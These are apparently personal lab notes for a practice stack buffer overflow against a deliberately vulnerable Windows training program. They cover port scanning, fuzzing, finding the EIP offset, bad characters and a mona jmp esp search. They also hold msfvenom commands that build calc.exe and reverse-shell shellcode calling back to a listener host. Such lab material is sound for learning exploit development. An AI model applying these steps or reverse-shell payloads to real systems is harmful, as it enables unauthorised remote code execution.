1. Start the DSBOFG application on a windows guest and attach the debugger as admin. Make sure its not in paused state. (ctrl-f2 to restart after crashes)

2. Scan to find ports #nmap quick 192.168.132.128 got port 31337 back

3. Connect and RE #nc -nv 192.168.132.128 31337 -Test and understand the program. This particular one will print whatever you type. "Hello <whatever we type here>!!!"

4. We now craft the fuzzer. We want to match how the program works with how we send and receive data to hit those expected patterns. We need to make sure we are also catching returned traffic or using a sleep timer between commands if we don't get returned traffic. -found crash: 200 bytes

5. Look up the #locate pattern_create #/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 150 Look at eip then copy to sister script. (no editing needs to be done to what is in eip in this case) //Some times the endingness of the most valuable bytes needs to be reversed depending on the program. #/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <eip> Found offset: 146 bytes

6. Then we make the next for this case we do: buffer = "A"*146 + "BBBB" + "\n" -and check for EIP to be all 42s Our next check is to see how long we get make the shellpayload without getting odd behavior(also note if ESP address changes at all from the last run): filler = "A"*146 eip = "BBBB" offset = "C"*4 buffer ="D"*(1500-len(filler+eip+offset)) #trying ~1500 Then we see that we got a break in our data and out last good address is 004b1f30

-We then subtract fisrt row of D's from this and get: 0x53c -dec-> 1340 bytes (useable). -Then we will check for bad chars with the bad char string.(\x00 will always be bad since its the null byte that says to end a string) -also noted that ESP is moving and we need to find an adress to get us there//make sure whatever address you use does not contain any of the bad chars//addresses are entered in reverse order 123456 ->56 34 12 !mona modules We will look in the ddls/exes for a module thats does not have rebase or aslr on. !mona jmp -r esp -m <module name> //!mona jmp -r esp -m dostackbufferoverflowgood.exe //things to look for: jmp esp, pop pop ret we get 2 options:

Calc shellcode command: msfvenom -p windows/exec -b '\x00\x04\x54\x69\x71\xa7' -f python --var-name shellcode CMD=calc.exe EXITFUNC=thread //can look at payload options with: msfvenom -p windows/exec --list-options RSEHLL: Calc shellcode command: //can look at payload options with: msfvenom -p windows/shell_reverse_tcp --list-options #msfvenom -p windows/shell_reverse_tcp -b '\x00\x04\x54\x69\x71\xa7' -f python --var-name buffer LHOST=192.168.19.27 LPORT=12345 EXITFUNC=thread Drop it in the script and run it for root!